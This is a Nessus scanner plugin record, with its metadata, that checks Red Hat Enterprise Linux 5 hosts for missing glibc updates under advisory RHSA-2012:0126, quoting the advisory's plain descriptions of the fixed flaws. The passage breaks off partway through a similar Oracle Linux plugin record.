ID REDHAT-RHSA-2012-0126.NASL Type nessus Reporter This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2012-02-14T00:00:00
Description
Updated glibc packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
moderate security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.
The glibc packages contain the standard C libraries used by multiple
programs on the system. These packages contain the standard C and the
standard math libraries. Without these two libraries, a Linux system
cannot function properly.
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way the glibc library read timezone files. If a
carefully-crafted timezone file was loaded by an application linked
against glibc, it could cause the application to crash or,
potentially, execute arbitrary code with the privileges of the user
running the application. (CVE-2009-5029)
A flaw was found in the way the ldd utility identified dynamically
linked libraries. If an attacker could trick a user into running ldd
on a malicious binary, it could result in arbitrary code execution
with the privileges of the user running ldd. (CVE-2009-5064)
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way the glibc library loaded ELF (Executable and Linking
Format) files. If a carefully-crafted ELF file was loaded by an
application linked against glibc, it could cause the application to
crash or, potentially, execute arbitrary code with the privileges of
the user running the application. (CVE-2010-0830)
It was found that the glibc addmntent() function, used by various
mount helper utilities, did not handle certain errors correctly when
updating the mtab (mounted file systems table) file. If such utilities
had the setuid bit set, a local attacker could use this flaw to
corrupt the mtab file. (CVE-2011-1089)
A denial of service flaw was found in the remote procedure call (RPC)
implementation in glibc. A remote attacker able to open a large number
of connections to an RPC service that is using the RPC implementation
from glibc, could use this flaw to make that service use an excessive
amount of CPU time. (CVE-2011-4609)
Red Hat would like to thank the Ubuntu Security Team for reporting
CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The
Ubuntu Security Team acknowledges Dan Rosenberg as the original
reporter of CVE-2010-0830.
Users should upgrade to these updated packages, which resolve these
issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2012:0126. The text
# itself is copyright (C) Red Hat, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(57929);
script_version("1.22");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");
script_cve_id("CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2011-1089", "CVE-2011-4609");
script_bugtraq_id(40063, 46740, 50898, 51439);
script_xref(name:"RHSA", value:"2012:0126");
script_name(english:"RHEL 5 : glibc (RHSA-2012:0126)");
script_summary(english:"Checks the rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Red Hat host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"Updated glibc packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
moderate security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.
The glibc packages contain the standard C libraries used by multiple
programs on the system. These packages contain the standard C and the
standard math libraries. Without these two libraries, a Linux system
cannot function properly.
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way the glibc library read timezone files. If a
carefully-crafted timezone file was loaded by an application linked
against glibc, it could cause the application to crash or,
potentially, execute arbitrary code with the privileges of the user
running the application. (CVE-2009-5029)
A flaw was found in the way the ldd utility identified dynamically
linked libraries. If an attacker could trick a user into running ldd
on a malicious binary, it could result in arbitrary code execution
with the privileges of the user running ldd. (CVE-2009-5064)
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way the glibc library loaded ELF (Executable and Linking
Format) files. If a carefully-crafted ELF file was loaded by an
application linked against glibc, it could cause the application to
crash or, potentially, execute arbitrary code with the privileges of
the user running the application. (CVE-2010-0830)
It was found that the glibc addmntent() function, used by various
mount helper utilities, did not handle certain errors correctly when
updating the mtab (mounted file systems table) file. If such utilities
had the setuid bit set, a local attacker could use this flaw to
corrupt the mtab file. (CVE-2011-1089)
A denial of service flaw was found in the remote procedure call (RPC)
implementation in glibc. A remote attacker able to open a large number
of connections to an RPC service that is using the RPC implementation
from glibc, could use this flaw to make that service use an excessive
amount of CPU time. (CVE-2011-4609)
Red Hat would like to thank the Ubuntu Security Team for reporting
CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The
Ubuntu Security Team acknowledges Dan Rosenberg as the original
reporter of CVE-2010-0830.
Users should upgrade to these updated packages, which resolve these
issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/errata/RHSA-2012:0126"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2011-1089"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2009-5064"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2009-5029"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2011-4609"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2010-0830"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-common");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-headers");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-utils");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:nscd");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5");
script_set_attribute(attribute:"vuln_publication_date", value:"2010/06/01");
script_set_attribute(attribute:"patch_publication_date", value:"2012/02/13");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/02/14");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Red Hat Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 5.x", "Red Hat " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
rhsa = "RHSA-2012:0126";
yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
if (!empty_or_null(yum_report))
{
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : yum_report
);
exit(0);
}
else
{
audit_message = "affected by Red Hat security advisory " + rhsa;
audit(AUDIT_OS_NOT, audit_message);
}
}
else
{
flag = 0;
if (rpm_check(release:"RHEL5", reference:"glibc-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"glibc-common-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"glibc-common-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"glibc-common-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", reference:"glibc-devel-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"glibc-headers-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"glibc-headers-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"glibc-headers-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"glibc-utils-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"glibc-utils-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"glibc-utils-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"nscd-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"nscd-2.5-65.el5_7.3")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"nscd-2.5-65.el5_7.3")) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : rpm_report_get() + redhat_report_package_caveat()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc");
}
}
{"id": "REDHAT-RHSA-2012-0126.NASL", "bulletinFamily": "scanner", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "description": "Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "published": "2012-02-14T00:00:00", "modified": "2012-02-14T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/57929", "reporter": "This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/cve-2009-5029", "https://access.redhat.com/security/cve/cve-2011-4609", "https://access.redhat.com/security/cve/cve-2009-5064", "https://access.redhat.com/errata/RHSA-2012:0126", "https://access.redhat.com/security/cve/cve-2011-1089", "https://access.redhat.com/security/cve/cve-2010-0830"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "type": "nessus", "lastseen": "2021-01-17T13:10:23", "edition": 21, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "oraclelinux", "idList": ["ELSA-2012-0058", "ELSA-2011-1526", "ELSA-2012-0125", "ELSA-2012-0126"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123990", "OPENVAS:1361412562310870629", "OPENVAS:1361412562310870556", "OPENVAS:881084", "OPENVAS:870545", "OPENVAS:1361412562310881217", "OPENVAS:881217", "OPENVAS:1361412562310870545", "OPENVAS:870556", "OPENVAS:1361412562310881084"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2012-0126.NASL", "ORACLELINUX_ELSA-2012-0125.NASL", "SL_20120213_GLIBC_ON_SL4_X.NASL", "CENTOS_RHSA-2012-0126.NASL", "SL_20111206_GLIBC_ON_SL6_X.NASL", "CENTOS_RHSA-2012-0125.NASL", "SL_20120124_GLIBC_ON_SL6_X.NASL", "REDHAT-RHSA-2011-1526.NASL", "REDHAT-RHSA-2012-0125.NASL", "SL_20120213_GLIBC_ON_SL5_X.NASL"]}, {"type": "redhat", "idList": ["RHSA-2012:0126", "RHSA-2012:0125", "RHSA-2011:1526", "RHSA-2012:0109", "RHSA-2012:0058"]}, {"type": "centos", "idList": ["CESA-2012:0126", "CESA-2012:0058", "CESA-2012:0125"]}, {"type": "cve", "idList": ["CVE-2010-0830", "CVE-2009-5064", "CVE-2011-4609", "CVE-2009-5029", "CVE-2011-1089"]}, {"type": "amazon", "idList": ["ALAS-2012-039"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28907", "SECURITYVULNS:DOC:27743", "SECURITYVULNS:VULN:12241", "SECURITYVULNS:VULN:10874"]}, {"type": "vmware", "idList": ["VMSA-2012-0018"]}, {"type": "ubuntu", "idList": ["USN-1396-1"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0055-1", "SUSE-SU-2012:0023-1", "OPENSUSE-SU-2012:0064-1", "SUSE-SU-2012:0033-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:36404"]}, {"type": "slackware", "idList": ["SSA-2012-041-03"]}, {"type": "fedora", "idList": ["FEDORA:D91FC208AA"]}, {"type": "gentoo", "idList": ["GLSA-201312-01"]}], "modified": "2021-01-17T13:10:23", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-01-17T13:10:23", "rev": 2}, "vulnersScore": 7.4}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57929);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0830\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "57929", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "scheme": null}
{"nessus": [{"lastseen": "2021-01-17T12:46:41", "description": "From Red Hat Security Advisory 2012:0126 :\n\nUpdated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : glibc (ELSA-2012-0126)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2012-0126.NASL", "href": "https://www.tenable.com/plugins/nessus/68456", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0126 and \n# Oracle Linux Security Advisory ELSA-2012-0126 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68456);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"Oracle Linux 5 : glibc (ELSA-2012-0126)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0126 :\n\nUpdated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. 